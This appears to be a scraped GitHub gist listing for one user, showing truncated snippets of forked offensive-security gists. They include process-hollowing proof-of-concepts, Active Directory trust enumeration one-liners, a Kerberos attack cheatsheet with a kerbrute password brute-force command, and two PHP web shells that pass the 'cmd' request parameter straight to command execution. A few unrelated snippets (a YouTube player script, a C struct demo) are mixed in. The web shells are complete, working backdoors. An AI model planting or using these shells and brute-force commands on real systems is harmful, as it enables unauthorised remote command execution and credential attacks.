@UserXGnu
UserXGnu / dotnet_etw.c
Last active March 7, 2022 12:54 — forked from xpn/dotnet_etw.c
A demo of how to collect information on basic .NET events from ETW.
#define AssemblyDCStart_V1 155
#define MethodLoadVerbose_V1 143
#include <windows.h>
#include <stdio.h>
#include <wbemidl.h>
#include <wmistr.h>
#include <evntrace.h>
#include <Evntcons.h>
using System;
using System.IO;
using System.Text;
using System.IO.Pipes;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Runtime.InteropServices;
using System.ComponentModel;
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
UserXGnu / Start-Hollow.ps1
Created March 19, 2021 10:46 — forked from xenoscr/Start-Hollow.ps1
Process Hollowing with PowerShell - by FuzzySec
function Start-Hollow {
<#
.SYNOPSIS
This is a proof-of-concept for process hollowing. There is nothing new here except
maybe the use of NtCreateProcessEx which has some advantages in that it offers a
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext.
On the flip side CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious APIs.
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible
to load the Hollow from an internal byte array straight into memory but I have not
UserXGnu / Hollowing.cs
Created March 17, 2021 12:32 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
UserXGnu / kerberos_attacks_cheatsheet.md
Created February 19, 2021 15:08 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
UserXGnu / youtube-mplayer.sh
Created February 20, 2019 11:08
Play YouTube videos from console using mplayer and youtube-dl
#!/usr/bin/env bash
youtube-dl -q -o- "$*" | mplayer -af scaletempo -softvol -softvol-max 400 -cache 8192 -
# Usage:
# youtube-mplayer.sh https://www.youtube.com/watch?v=v-OS-DgxuFo
UserXGnu / php rce
Created November 5, 2018 11:34
Php RCE
<?php
echo "<pre>";
echo shell_exec($_GET['cmd']);
echo "</pre>";
?>
#include <stdio.h>
typedef struct _a {
void (*msg)(void);
} A;
typedef struct _b {
A parent; // inherits the characteristics of A
void (*msg)(void);
} B;